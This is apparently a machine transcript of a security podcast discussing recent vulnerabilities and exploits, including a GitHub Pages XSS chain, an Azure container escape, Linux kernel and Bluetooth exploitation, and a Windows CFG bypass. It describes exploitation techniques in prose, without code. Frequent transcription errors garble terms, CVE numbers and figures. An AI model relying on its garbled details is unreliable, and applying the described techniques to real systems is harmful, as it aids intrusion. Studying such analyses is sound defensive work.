least. Yeah, so that gave them JavaScript execution on the page. The third issue was required for getting around the nonce checking in the authentication flow. And that was based on the fact that sibling private Pages within the same organization could set cookies on each other which kind of makes sense, but they know you can take advantage of that by setting a fake nonce on a sibling page then getting it passed down to the private page and that's if you can bypass that host prefix protection which leads to Issue number three, which is where the browsers work a sensitive to the host prefix check but the GitHub private page the server was case insensitive. So again, you kind of have that decent going on. So if you change the cookie names of the prefix was a different case get Hub with still accept it even if the browser wouldn't the fourth issue that makes a stack really cool is the fact that the response on the off and point was cashed based on the parsed page ID value which means an entire can basically do cache poisoning to it other users with the xss making it a much more interesting attack final issue was in this configuration where public repositories could have private Pages which could be viewed by anyone. So I just did private and air quotes which
zi
it's still kind of intend like it's a private page or it's part of the private page program. But if they make the repository public then anybody can read so I don't know. I mean that doesn't that feels almost intentional like that. You make a public. Of course we can read the pages now. Like I don't know if I necessarily agree with calling it a Miss configuration. I know they do in the right up so fair enough,
Specter
whatever. Well, I think we're the Miss configuration comes into play is okay. Yeah, you can view those private Pages which is intended but it allows a pivot point to be able to get access into internal private Pages by poisoning cache poisoning and employee since because remember sibling cookies can set cookies on other pages in the same organization. So that's where I think it kind of comes into The Miss configuration is is not handling that case. I guess it's kind of an edge case of Escape.
zi
I believe you can do that with the original one though. So say have the example here now when the privileged user visits the unprivileged organization, they get the excess of their and they set the domain cookie there and then perform the same attack against the privilege organization. Whereas using this thing using the public-private pages if somebody or if something had that set up and
Specter
then they'd be able to
zi
attack it directly without with that middle set. Because they were going after that last one for the CTF bonus, which I guess we haven't really mentioned yet. But with github's Bounty program specifically on the private Pages Bounty they have bonuses for actually writing payloads at do something. So they've got flagged up private org dot GitHub dot IO. If you're able to read that with user interaction, I think it's like a 5k bonus. If you're able to read that without user interaction. It's 10K. And then if you're able to read it without user interaction or sorry just if the account is outside of the private organization, they get another 5K for so it's going for the bonuses where they kind of add it in. This is where this park came in. So I think that it basically just lets you skip that one step of the exploit chain.
Specter
Yeah, those CTF bonuses were really cool. I thought I don't remember hearing about that when we've covered like some of the other GitHub issues. Maybe we didn't I
zi
just heard it once before nah, this one in particular, but when we were dealing with the off by passes, I think in GitHub the CTF bonuses at least came up in those write-ups, I think
Specter
okay, so I just probably forgot but yeah, that's a that was an interesting aspect. But yeah, I mean not a not a bad payout for these issues. I think you mentioned the payout amount. But yeah, it was like 35k total. So yeah quite a nice haul for the researcher.
zi
yeah,
Specter
next next we have a cloud attack a privilege escalation inside of azure functions containers, which run Docker and a privilege context and that is an important thing to note because when Docker is ran with the privilege flag, it'll share devices like character devices and stuff with the host between the host and the container guests because donger like oh sorry were you going to I was just going to add
zi
on that like running it as privileged basically means if you get real Locked inside of the container. You can give root in the host. Like that's the deal with privileged if privilege facial basically means a root is root
Specter
equivalent. Yeah, so basically for those who don't know Docker isn't a full VM right it's going to it's not going to be running its own guest Colonel it's going to be sharing the colonel with the host and that's kind of where the problem comes into play is the problem is that the device sharing is overly permissive the persistent memory or p.m. Device is exposed to the sandbox with read right capabilities and those devices can be used to get control of the hosts file system and change file Contents using these a block command and ext4 ugly. They said the file system was initially they tried using that to get control over at Sea password, which didn't work at first because of how Linux kernel does file caching. Basically, it won't propagate file changes until the cached pages are discarded. I think we talked about this before in the context of another vulnerability, but that's where the royal flush of the name comes into play. They basically use the F advise post-sex. To tell the colonel to flush pages from the read cash to get the change is propagated to take control of that. See password to be clear. That's not the only attack you could do you could essentially attack any file on the hosts file system as I understand it. So your possibilities are basically endless their nsrc stated that this issue had no impact on Asia functions users since this was these Docker containers run inside of a hyper-v guest so I was kind of saying earlier Docker doesn't do its own isolation with running its own guest Colonel. So what Microsoft does is they run the docker instance inside of a hyper-v gas so they have that multi-layer isolation. So even if you pulled off this attack, you wouldn't be able to take control over the real host. This is the host you compromise in this case was still a guest right? It's kind of like nesting the holes with sandboxing still interesting though. And this could like this would definitely be part of a chain if you were trying to do like a full Escape. Oh, yeah, cool attack, but it's mainly just comes down to don't be overly don't be oversharing when it comes to sandboxing. The entire idea of sandboxing is you only provide what's absolutely necessary. Right? And from what I can tell these p.m. Devices definitely were not necessary and should not have been exposed to the sandbox with rewrite capability.
zi
So yeah, although like the fact that it's exposed with the readwrite is intentional because the default all to believe they show is that everybody does not get read write access to it. They show a A screenshot showing exactly that so the fact that they do enable read-write access within the Azure functions container. It makes it seem like there is some reason they did that. It's not clear what that is, but somebody made that decision at some
Specter
point. Yeah, and it seems like this issue is probably still an issue because they never mentioned them Microsoft fix it and like I said, they mentioned that nsrc didn't consider it as security impact because I guess where it's running inside a hyper-v. Guess they don't consider that a security barrier being able to go from Docker container to escaped outside the docker container. It's another one of those cases where I don't necessarily agree with Microsoft and how they said security boundaries, but I mean that they are the
zi
It's cycling what
Specter
to Microsoft I want to know exactly what this
zi
is. Classic Microsoft party, do do do some security Implement some security mechanism, but say it's not a security
Specter
boundary. Yeah won't fix favorite favorite tag of Microsoft when it comes to those types of security issues. Where They don't consider the security boundary, which I think they should but you know, whatever. We have a quick issue in qnap NOS in the surveillance station local display function and point. It takes untrusted data in the form of parameters in an HTTP request. It's basically one of those don't use their copy where you shouldn't type of issues where they used to copy when receiving SIDS and parameters. It has a fixed size buffer. I'm not exactly sure the length because the snippet from the eye to the community. Was pretty limited but just by passing a really large string that's like x-5000 bytes long. You can stack smash right you just overflow the stock buffer assumingly. They don't use that cookies because this issue was labeled as a preauth remote code execution which isn't too surprising because as we've said before unfortunately mitigations are basically non-existent in these types of products, especially stack cookies because if they had stack cookies here at this probably wouldn't be exploitable for getting good execution is basically what they're doing is they're just smashing the stack to get to the return pointer and there's nothing protecting that return pointer, but it would have been so
zi
much worse performance. They had staff cookies.
Specter
I know if you would run like maybe two percent performance overhead. I don't care what
zi
the performance overhead is for stack cookies. Actually. It is a lot higher than some of the other things like Dapper a SLR which Well depth at least hardware and force because it is a software thing. Like it does the extra push every time it does the extra check every time you return. So if you've got a lot of functions like there is a significant overhead. So why there's usually some heuristics on how the compiler decides to included or not? Well, you can change that to include on everything but by default mostly use a few heuristics on it. But yeah, I mean that's honest penny
Specter
where that takes untrusted input should have a stack cookie in it. Yeah. Yeah. So yeah pretty straightforward issue just like it's not that you can't use sir copy anywhere, but if you're going to use sir copy make sure it's taking a string that is entirely validated and it's not going to be just some really long string that somebody passes and or something. So yeah, I'm gonna be honest Leapster copy and you go
zi
and put no by Tin Man. I like you just jump ahead like 0x80 bytes coughs and no bite there and then sir copy
Specter
your kind of limiting it
zi
that way. I would rather see, you know, stir and copy or something where it's kind of built into the function, but there are secure ways using stir
Specter
coffee. Yeah, our next attack is on Gray. Where's domain time to which is a software and custom protocol for trying to keep clients and servers as closely synchronized as possible. It's a man on the side attack, which I'll be honest was a new term to me. It's basically like an MIT em, except you can't manipulate the data in Flight. Do you can in like inject data in between so it's kind of like an But a little bit more limited so one of the things the application will do which is pretty common is it will check for any updates from the update server when it launches which it'll do by sending a UDP query sent from the DT tray application. If an attacker can intercept that and respond with a legitimate looking URL before the actual server does they could be fooled into downloading a malicious data binary? Right? So it's basically just like a race on the Stations between the client and the server and being able to inject that response. It is worth noting. This isn't the privilege escalation. It basically gets an attacker a foothold on to the system. But you're going to be compromising the application at the level. It's running at right you're not going to be able to escalate using this this bug which they point out of the blog post
zi
like a remote user shouldn't have code execution on your system at any user level. So it is kind of a escalation of privilege in that sense, but it's not an elevation to Like Reuters, I guess in this case the system where admin? Yeah, but I will also mention I do talk a little bit also about the other option of racing the DNS. So DNS also potentially happening over UDP. So you can inject your own response to the DNS requests. So then you could use the real address or a real looking address just putting in HTTP and https and intercept that also because you drill where it's going to go by intercepting our by manipulating the DNS response, I should say That's kind of the other attack scenario. We sideshows racing this one. You can also just erase the DNS lookup which is one of the options they provided their actual attack script, but overall, I mean, it's a simple issue just really stems down to the fact that UDP doesn't really have any guarantees and can easily be spoofed.
Specter
Yeah, it's interesting. This isn't a product that like I don't think we've ever really covered before like at this type of product with time synchronization. So it's always nice
zi
think we covered. I feel like we've covered one time server issue before. I couldn't tell you what episode though.
Specter
Okay, that would be interesting to look back on because I thought that was when we haven't really covered before in terms of product type. But yeah, anyway, let's move into the most fun exploit section of the show for me, which is the kernel exploitation stuff. Our first Colonel exploit is from Alexander Popov coming out of xerocon. It is a 4 byte right after free in the Linux kernel in the newer AF zi socket family specifically through a socket option because of course it boils down to a race condition where the virtual socket transport is copied outside of the Locking window. So it's kind of that classic not maintaining ownership of a pointer before copying it right pretty blatant race. Whenever you're copying a reference to something do it inside of a lock or else it's going to be erased or it's going to have the possibility of being race. Funnily enough this bug was found by syscall her though. It was really difficult to reproduce because the bug triggered when updating a buffer size. So they had this socket option for being able to change the buffer size which pretty common and the networking stack but the path would the path that had the uaf would only get taken if the size was different. Otherwise, it would just bail out early. So Alexander States, they weren't totally sure on how sis collar even age to hit this crash because it took size from the return value of the clock at times the skull which normally would be consistent when because like the input is generated or is yeah, it's generated that time of fuzzing not a time of execution like when it's chattering the the inputs I can try to shed a bit of light on this it basically comes down to house this caller runs programs. So this is called Deb's have done a few cool talks about how Um their father works, but basically they take these programs which are defined manually and create sets of them and mutating them involves like adding in calls or removing them or change data passed to them. And what are the things it tries to do is it can try to force Races by setting a program to a blocking program to basically Force another thread to run when it reaches that which normally like blocking programs are used to prevent infinite. Going on reads and writes for example, so if you try to read when there's no data there it's going to hang infinitely. So since caller will set that as a blocking syscall, which they abuse four races, right? My best guess is something in the routine that uses the race mode allows the parameter to be regenerated for that thread that is just kind of speculation on my part. It is kind of difficult digging through this says color code base. Honestly, it's kind of a pet peeve of mine. I do not really like the way Code is structured. But yeah, it is a little bit strange. I don't know for sure. But I'm guessing something with how the blocking like the race mode works where they try to get around blocking programs leads to the parameter being regenerated there. Anyway, this leads to a 4 byte right after free 40 bytes into an object and the came Alex 64 cash which for those who don't know Linux kernel has various K Malik Anonymous caches, so when you hit Do you have like a use after free? For example, you can only hit objects that are in the same cache size. So for KML like 64, that would be any object. That's 33 bytes long to 60. Yeah, 64 bytes long. So yeah use this to smash and overlapped message message object which gets allocated in the message sends the skull ironically he smashed the security pointer inside object, which is used for selinux stuff that pointer basically gets freed. Whatever a Sanchez received and popped out of the queue. So he was basically able to turn that for bite right after free into an arbitrary free which when chain with an info leak that'll get you code execution with enough work because you can just you can get a targeted use after free on whatever pointer you want to Target which he did do the info leak was pretty noise. Like noisy mind you he basically abuses he abuses a warning through a cotton all T reference on the transport with a similar issue, which is viable. You do get Colonel addresses from the register contact stump, but it's very noisy. It's directly inside of the log. So it's totally fair for exploitation if you don't care about that, but there are some situations where you don't want that information going directly into the log because that leaves a trace basically He then uses arbitrary free to get a full use after free on the same object that messes messes object. So the same object but being able to control the whole object instead of just four bytes. He uses that to get arbitrary read by corrupting the message that information. He then finally uses the uaf again on a different object the S key be shared info object to get code execution through the destructor on that which he uses to construct arbitrary, right? So ultimately, Similarly when you have arbitrary readwrite getting rude is pretty straightforward on Lennox. You just have to smash the credentials of your process pretty straightforward to do unless you're looking at Android and you're on you're on like a Samsung phone or something and you have Knoxville with but this is just hitting Linux in general sot android-specific. In fact, this socket probably doesn't even exist on Android. One thing I thought was cool. Was that the end? He points out what would mess up the exploit ability of the strategy. So it points out a few things like noting that something like CF I would stop it. Obviously where you're using the the destructor in direct call to get code execution to get their archery. Right Gadget. Also noting that preventing user fault FD would make it harder to exploit the uaf, which for those who aren't familiar with like Linux kernel exploitation user fault ft is a pretty common trick. It basically allows you to handle page faults in user space. So you can set a Handler that hangs the colonel when it goes to read that address. So like fries a threat essentially to keep your allocation in place. So preventing that would probably hit the stability though. I don't think it would prevent the exploit entirely. Another thing is the D message restrict Colonel option if that was set it would prevent the info League because the register contacts wouldn't get dumped to the message log, right? It might be possible to derive a different info link from this issue that said it might be difficult. You would basically have to hunt for a different spray object to Target where you are fixed where and the object you're hitting like you're always going to hit 40 bytes under the object that is going to be really tricky to find another object but it is technically a possibility that you could use to drive an info leak if you really wanted
zi
to yeah would but tricky but given like I feel like Came out 64 should have a good number of objects going through it. Like that's not that's not a crazy size. Like it would take time to find something or maybe you know code he'll queer but otherwise like I think it's reasonable to assume that there might be another
Specter
object. Yeah, the came out 64 cash is one of the most commonly used caches. It's one of the most popular ones. So yeah, I mean there's probably a different exploit strategy out there, but you have to put a lot of time into finding it. This is actually an area where something like code ql would probably be a good idea to use try to query for Target objects. You could hit if you're looking for like an exercise or something to do in code you all that could actually be a very good application for that. But yeah, very cool exploit. Another thing I want to call out is the fact that this explicitly bypasses supervisor mode access prevention and supervisor mode execution prevention, which like these are pretty powerful mitigations that are often to hand waved from a lot of the kernel exploit write-ups I've seen so it's nice to see that it's mentioned here and isn't an issue. It's not directly bypass but it just goes to show that these mitigations aren't going to stop everything right? And for those don't know what s happened as fuck do they basically make it so that Colonel cannot access or execute anything in user space when running in kernel mode, right? So you can't fake objects and user space or use rope chain gadgets that are in user space in a colonel Rock chain. That's basically what those medications are doing. In this case though because he has the info leak and he's able to set up the arbitrary read and arbitrary right gadgets. That's basically not an issue. So, yeah, very cool posts and it's always fun to see Colonel stuff. And we have more Colonel stuff coming up to the flow. Also put out a post about exploiting to bugs. We previously covered all the way back on episode 49 of the podcast. It's a stack-based info leak in the a 2mp protocol where there were uninitialized Fields And as structurally to user space and there was a type confusion on the mode set in the a 2mp channels where the receive function will call the SK filter function on channel data thinking it's a socket object when it's actually an Ant-Man Our object so I'm not going to go too deep into the exploit or the vulnerability details because we already covered those like I said back on episode 49. So this right up and this right up doesn't really talk about the vulnerabilities much either Beyond, you know, what they are. It doesn't go into in depth detail. It mostly talks about the exploit process. So zi know you were looking at the exploit strategies and probably have a better grasp on them than I have because I was kind of more focused on the other issue. So I'll let you take
zi
One away fair enough and that's one is a little bit complicated and how we actually goes about doing the exploitation. So hopefully I don't butcher it that said if I do and you have no idea what I'm talking about at some point it is a really good right off like gives a lot of information that I'll try and summarize here but as Specter already mentioned there were the three issues. We've already talked about them the two that actually matter here is just bad choice, which is is a stack-based in Foley fairly straightforward basically in the response object. It creates in response to want the a 2mp protocol request. It has this well response object RSP object those out the ID and status of that in their case and sends it back to the user using like size of so all the things that are uninitialized in that get leaked out. That's all that really matters is that you're getting some stack Information With It Bad Karma. The Specter also said is where when you're in the when you have an A 2mp or when you're in when you have that sort of Channel. It uses the enhance retransmission mode and that's by Specter. I believe it'll use that and sorry, I guess I'm getting ahead of myself with the a 2mp channels. It's expecting a socket, but it gets in a MP manager. So in order to actually start exporting this though the actual I was just starting to mention with the mode is that you can't actually access any of the a 2mp code early stuff you need while the channel is configured in that enhance retransmission mode. What happens there is SK filterable and of crashing when you try and actually access the a 2mp subroutines. So the first thing that he kinda has to figure out is well, how do we change that mode in theory should have really be able to but he does find that you can just send the reconfiguration thing. Even if it hasn't been requested like even if the client side hasn't requested some to reconfigure it can just say hey, yeah reconfigured to mode basic send that off and basic mode would you shouldn't be able to use for this type of channel of effectively just uses the Ops. Winter and use that as for all the function call so that gives you kind of a target for the EIP or for our IP Control. so you've got the so you've got that as a way of kind of getting around and getting access back to off the a 2mp. So now focusing on kind of the real issue and I'd encourage you just to read the write-up or that little bit. I feel like the actual type confusion I think is a bit more interesting. Well, I mean that's in a couple way. So as we've already mentioned you've got this A&P manager and the socket classes. That's where your confusions happening. the the A&P manager is 0 x 70 bytes in size but the only access on the actual socket, that's useful. Is this our see you dereference? Obviously, if you're listening you can't hear this but filter equals RC you dereference and it goes to the socket socket filter. That happens to be at offset zero X 1/10. So it's actually beyond the end of the ANP manager object itself. So even if you had complete control over that a MP manager, you would actually be going Beyond. the edge of the actual object so what they have to do instead of using the ANP manager for very much instead. What happened is they use some heat groom and so they can get something they controlled immediately after where the ANP manager gets allocated. So if actively needing some primitive that can allocate and you know, 65 to 128 bytes. So basically line to get in that cave Malik 128 and not in like 64 anything lower. Nothing higher. I like oh some kind of finding the get a MP associative response. I have no idea what that does. But what it does is allows it'll duplicate a string in memory. - I find the code hero use came m dot upon it or duplicate it. So that gives that basically becomes the Primitive that gets used here for any of the Heap allocations you're able to control the size that gets copied and the actual data that gets copied into it. The only thing is you can't control the free and if you're wanting to get if you're willing to use this for like keep grooming, you're going to want to have some control over that freight concrete holes where you want interestingly the same kind of leaks memory because it will close this a sock value or sorry. It'll free that when the channel closes, but every time you call this thing every time it looks it up it just overwrites that pointer. So in theory you call a twice and what you end up having is it will overwrite that pointer. So when it freeze it it only freeze one of them. Which so by calling this thing twice and then closing? And doing that is like a bunch of times you're able to Heap spray engraved keep spray pattern of allocated free allocated free allocated free, which is exactly what you need for. Abusing the Bad Karma where it's going to try and access Beyond the Edge of the first Beyond the Edge of the actual pointer you provide it. Or at least Beyond where it should be. So with that they're able to get control of the memory that is one block away from that a MP manager. So you're able to get control of the ska underscore filter This is a long post. I can't find the code to pull it off by Gary to get control of that the reference at that point. You can't roll what's there and that's where leaking the memory you need to know some pointers got I'm going to say kind of Lucky kind of control was able to leak using the bad choice was able to actually leaked the pointer to the channel object itself. Oh. And was able that basically ends up being and came a lock 1024. And I'm just my saying Chad. We've had a few people asking about PS4 exploits. We have no update on that and asking isn't going to help. So coming back onto the topic here with bad choice, you're able to leak memory. I won't go into all the details, but actually by making one call and then the next call. He was able to control the stack. So it exposes the value that was useful specifically the L2 cap Channel object. So putting kind of everything together now that I've talked about you're able to control that dereference and the dereference itself actually gets a little bit more complicated. Let me see if I can find the right code for
Specter
it. Is it because of the RCU aspect or is it just the way that the pointer is
zi
used? Oh, the reason why it gets a little bit more complicated just because you've got several dereferences. I just found it here the SK filter you controlled that dereference c then D to control. How does the probie reference and then finally the actual function called the reference or like the function pointer dereference? So just a little bit more complicated because you've got the three layers of
Specter
indirection. So you can fake the filter pointer and then you set up a fake object to get the yeah function pointer hijacked. Yeah. Okay, that makes
zi
sense. Yeah, and it helps because he has that came a lock 1024 block that he can control and that's from bad choice either way. So you are able to control that use that our IP Control to get to a stack pivot that points that 1024 size buffer and then it was just a raw too. And run command, which was pretty much the same Technique we saw in. Like he has a link to so we've talked about it the CV 20 1918 683 which was another which was opposed actually from Alexander Popov. Which I believe we would have covered early last year. So that leads to the Roth in a very and we covered in episode 25. Are we covered that technique, I guess in episode 25 very kind of roundabout. It's a detailed blog post. I am definitely not doing it justice and trying to explain everything here briefly or not. So
Specter
briefly. One thing I am just trying to check really quickly is do you know if the fake fake object like the fake filter is kept in user space or does he sprayed in the kernel
zi
space? Kernel space Oh, that's where the Heap allocate that keep primitive that I
Specter
mentioned rights problem with that. I just wanted to be sure I felt that was the case, but I wanted to verify that the reason I bring that up is because like I mentioned with the last issue If This Were faked and uses Base which technically you could do you would have an issue with supervisor mode access prevention. So with the way that he does it here was spraying it into the kernel again. It's it's getting around the those mitigations invest map and this map. So yeah, that's cool to see that we have back-to-back posts that that both handle that that mitigation them. So
zi
I guess one other thing I'll call out. Actually. I guess it doesn't really matter. But now that I've teased that we did have to use fragmented packet at one point just due to the MTU size. But you can get more details by actually reading I
Specter
guess yeah, they're like you said it's a very long post. There's a lot of good information in there. That's just it's hard to cover on the podcast because we'd be here for
zi
hours. Yeah. It's a good post. Like I would absolutely recommend giving this a reed sea covers a lot of the details that you know are interesting and there's not a lot of fluff.
Specter
And it's a good insight into what's involved in modern Colonel exploitation. You kind of get that question quite a bit with like, okay. What is modern Colonel exploitation look like because a lot of the resources out there are four older exploits from like 2014 or 2016 or whatever and the landscape has definitely changed since then so these types of write-ups are kind of a bit rare, but they give needed insight into what's involved in modern Colonel exploitation. So if Looking to get into that kind of stuff. This is like the post that you should read for sure and the flow is a really good writer. So like zi said not a lot of fluff or anything there. It's all relevant and and then good information. So we'll move on to our last exploit topic will knit off with a new CFG bypass technique in Windows using remote procedure call incur or RPC that was discovered when analyzing and Internet Explorer vulnerability the post codes into some details on the vulnerability, which is a They use after free in JavaScript attribute objects where the value of callback can get abused by an attacker to clear the attributes, which is unaccounted for when the Callback returns. Now what CFG does is it tries to make it so that you can't hijack and direct calls as an attacker from something like a V table to get code execution, even if you have a use after free and the way it does that is it stores a bitmap of functions which are valid to be jump to and it does like call Target. Validation to ensure okay where you're trying to go is that actually somewhere we've marked as safe to jump to if not crash or whatever, right or just don't do it. I think crashes the common side effect there. But yeah, it's basically in place to prevent hijacking of the control flow as the name implies right control flow guard what they managed to do though was abused the windows RPC to get a call Gadget that allows them to call any function with any parameters as long as the function is in that ballad bitmap Then by using that you can call virtual protect which is in the bitmap and then modify the guard check memory function pointer to be read write execute and then you can remove the pointer which tries to validate the call Target and just replace it with this call Rhett, which is basically just patching out the gold Target validation. You can then pop off the right flag again doing the same trick and CFG is no longer an issue. You basically just knock it out. So yeah, it's not when you deal
zi
with mitigations by He's turning them off on the fly.
Specter
Yeah. Yeah, it's pretty funny all that work and it's just turned off like a like an on-off switch. But yeah, basically just abusing the fact that you can use our PC to call valid functions, but abusing them in a way that Microsoft and really expect right calling virtual protect in order to patch the memory and remove their mitigation. And this is one of the things we're like software mitigations are kind of weaker if this was a hard one, Mitigation this wouldn't fly. But because CFG is software. That's where the it's kind of weak to these kinds of attacks. Right? So it's
zi
almost will mention. I 0x ABC 0 mentions that this is not new bear. I mean, I was kind of reading this feeling like I'm surprised we haven't seen this before nonetheless me. It's a good write-up of a CFG technique. But yeah, it does look like it's not new there. is Mxa tones. I'm not sure how to say that has a mitigation. Oh Cyril actually include include that here in the description. But yeah, so looks like it is a known technique nonetheless. It's still an interesting right off. That's come off. I guess it's not from the last week. So maybe we'll just have to cut this section instead.
Specter
Oh, I mean I still think it's cool to bring up and I was kind of thinking the same thing when I was reading it was that not to downplay the issue but this is like something where it almost seems too simple the technique for it to not have been known by other people. As far as like that kind of technique goes
zi
so no, I mean when it comes down to it like the sitter control flow guard in this case software-based very very wide. Like it just allows you to call any function as long as it's a valid function. You can call it. Like that's the only criteria it doesn't do any sort of checking to make sure like this area of code should be able to call that function or needs to call that function. And so because of that like they're definitely a lot of techniques of getting around CFG the good clear right up though. Nonetheless. Yeah, and I mean, I wasn't familiar with this myself though. I also don't do much on the window side.
Specter
Yeah, basically what I'd say, they're like what you said kind of spark something in me. It's it's one of those things where coarse-grained. Checking is just always going to kind of let you down right if you had that fine grain checking of checking not just having a bitmap of what's valid but having bitmaps specific to each area of what's valid for that area. That would have protected against this type of attack. But where it's so coarse grained than it's just one big bitmap of what you're allowed to do. Yeah, there's a lot of different potential little tricks you can use to get around it. So yeah, and that's just one of them.
zi
All right, so we'll move into our last topic of the
Specter
show, which is a research topic. It's basically security things. It's another Keys cook posts on Linux 5.9 this time a few things in a we can talk about one of which killing out an entire class of vulnerabilities. So one of the things that reduce was clangs automatic zero initialization of all stack variables. So yeah rest in peace stack-based info leaks like the ones we've covered in this show like the Flo's issue where there was a struck that was leaked on the stack and you use that to chain with your exploit that would not fly with this with this mitigation because all of those fields would be initialized to zero there wouldn't be any uninitialized kernel memory to leak. So yeah that we have to see it actually attacks have
zi
seen actually getting used to
Specter
yeah that is very thing that some of the things in these security posts are not on by default. You kind of have to turn them on which most people Do because
zi
still interesting to kind of talk about what's coming down the pipeline
Specter
for sure. The other thing that was interesting here to was the hardening of the free list on the slab allocators against double fries and cross cash freeing so slub has had this for a while. It's not on by default but slab hasn't had that option. So while the slab allocator isn't used as much it's still a good step to be able to have it. If people want to turn that on usually you'd only like this is another one of those options where it's not on by default. It's just kind of there if you want to have a hardened build I guess which some people do absolutely do but a lot of people don't go through the process of changing configuration options when building the Linux kernel because there's so many of them and you have to kind of know they exist you're not just going to stumble upon it looking through, you know cake and fig and go. Oh, hey this one out of the three hundred thousand things that are here is here. That's
zi
cool. I mean you don't free through the dialogue when you set up a new config or even just do old config and like go through absolutely every option. No,
Specter
yeah defaults are fun. But yeah, I mean, it's good that it's there. The option is there. I think the most notable thing here, is that 0 initializing thing with clang I think this is a little bit different than another mitigation that was kind of criticizing was zi. We don't we don't have a talk about topic around it on the podcast, but there is another thing that claim his research recently introduced in kleine-levin. I think where they added being able to 0 register values after a function is finished like before it returns and your performance on a kernel that is built against that would tank. It would be terrible. I think this is different. I think this is basically it's just initializing stack variables not initializing all the register. So yeah, it's going to be an effective mitigation because there's a lot of stack-based and beliefs out there in the colonel. So it's a class of attacks that makes sense to kill from a developer standpoint. There is some other stuff in here as well such as like a new capability some stack protector support for risk be which I mean risk the who's using that I mean, yeah, the most notable ones are the crosshatch freeing double free protection on slab and the zero initialize. So yeah, just like you said one of those things to look out for coming down the pipeline that said that will conclude our our topics for the stream. I think somebody in chat just actually yeah, they posted the commits that added what I was talking about. So maybe we can bring it up on stream quickly since we have that. But yeah, they basically added it. So it puts in instructions to zero it all the registers. But like this would absolutely mess with like instruction caching and it wouldn't even really be that effective because it might it might kill some rap situations. It won't kill all of them and it won't kill job. So you're losing a lot of performance for not a lot of game really but yeah, it's kind of funny to see I don't know why clang decided to invest time. That oh, actually, this is GCC. Sorry so does GCC do the same thing as well zi rowing of the scratch registers? Okay. Yeah.
zi
I don't know if I don't know why worked by playing it did add it as he said with Clay he Levin Dude, I don't know
Specter
why like this is kind of a waste of time in my opinion. But hey, it gives a good laugh. But anyway, that'll wrap up our topics for the show. Thank you to everyone who tuned in you can catch the balls on Twitch or on YouTube as well as
zi
anchor. So are you take just kind of jump in on you? I guess it was reading the tweet from Keys Cokie actually mentions that GCC just mentioned in GCC Lovin. So if it's in clang, I'm not sure what version I may be mistaken maybe saying he loved the way to go.